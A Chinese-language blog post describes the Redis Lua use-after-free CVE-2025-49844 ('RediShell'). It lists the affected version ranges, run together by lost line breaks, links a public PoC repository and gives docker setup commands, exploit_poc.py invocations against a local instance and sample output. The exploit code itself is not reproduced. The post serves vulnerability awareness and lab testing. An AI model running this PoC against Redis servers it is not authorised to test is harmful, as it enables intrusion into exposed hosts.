【CVE-2025-49844】Redis远程代码执行漏洞

秋水5326

1:漏洞简介
此次披露的 Redis 漏洞 RediShell（CVE-2025-49844）获 CVSS 10.0 分 —— 这一评分极为罕见，过去一年全球仅约 300 个漏洞获此评级，同时它也是首个被评为 “重大” 级别的 Redis 漏洞。该评分不仅反映了远程代码执行这一技术层面的严重性，也与 Redis 的常见使用场景和部署方式密切相关。Redis 在云环境中被广泛用于缓存、会话管理及发布 / 订阅（pub/sub）消息传递。尽管 Redis 过往的安全记录良好，但此次漏洞与普遍存在的部署问题叠加，使其潜在危害大幅升级。

2:该漏洞影响范围
Wiz 研究团队发现的远程代码执行漏洞 CVE-2025-49844，影响广泛使用的 Redis 数据库。该漏洞本质是 “释放后使用” 内存损坏漏洞：攻击者发送恶意 Lua 脚本后，可突破 Redis Lua 解释器沙箱的限制，执行任意代码并获取主机访问权限。各机构修复漏洞的紧急程度，需根据 Redis 的安装方式及暴露范围来确定。

3:受影响版本：version < 6.2.207.2.0<=version<7.2.117.4.0<=version<7.4.68.0.0<=version<8.0.48.2.0<=version<8.2.2(其他支持Lua脚本的Redis版本)

4:漏洞复现
项目地址：https://github.com/raminfp/redis_exploit
环境搭建：# Install Docker and Docker Composesudo apt-get updatesudo apt-get install docker.io docker-compose
# Install Python dependenciespip install redis colorama
# 1. Start vulnerable Redis instancedocker-compose up -d
# 2. Wait a few seconds for Redis to startsleep 5
# 3. Verify Redis is runningdocker-compose ps
# 4. Run the exploitpython3 exploit_poc.py -H localhost -p 6380 -m all

基本命令：# Check vulnerability onlypython3 exploit_poc.py -H localhost -p 6380 -m check
# Run basic UAF testpython3 exploit_poc.py -H localhost -p 6380 -m basic
# Test sandbox escapepython3 exploit_poc.py -H localhost -p 6380 -m sandbox
# Test advanced memory corruptionpython3 exploit_poc.py -H localhost -p 6380 -m advanced
# Run all testspython3 exploit_poc.py -H localhost -p 6380 -m all
# With authenticationpython3 exploit_poc.py -H localhost -p 6380 -a "password" -m all

测试成功（易受攻击版本）
╔═══════════════════════════════════════════════════════════╗║          CVE-2025-49844 (RediShell) PoC                  ║║          Use-After-Free in Redis Lua Interpreter         ║║          CVSS Score: 10.0 (CRITICAL)                     ║╚═══════════════════════════════════════════════════════════╝
[*] Testing connection to localhost:6380...[+] Connected successfully![i] Redis Version: 7.2.0[*] Checking if Lua scripting is enabled...[+] Lua scripting is enabled!
[*] Checking vulnerability status...[i] Detected Redis version: 7.2.0[!] VULNERABLE: This version is affected by CVE-2025-49844[!] Update to the latest patched version immediately!
[*] Attempting basic UAF trigger...[+] Lua script executed: UAF pattern executed[!] UAF pattern triggered (simplified demo)
[*] Testing Lua sandbox boundaries...[*] Testing os.execute...[+] Protected: os.execute blocked[*] Testing io.popen...[+] Protected: io.popen blocked[*] Testing loadfile...[+] Protected: loadfile blocked[*] Testing package.loadlib...[+] Protected: package.loadlib blocked
[*] Attempting memory corruption pattern...[+] Memory corruption pattern executed: Memory corruption pattern completed[!] In vulnerable versions, this could lead to RCE!
============================================================[*] PoC execution completed============================================================


参考链接：
https://mp.weixin.qq.com/s/GiL9Ma_jDR9AHt9RtULxuQ
https://blog.csdn.net/weixin_45581780/article/details/152735500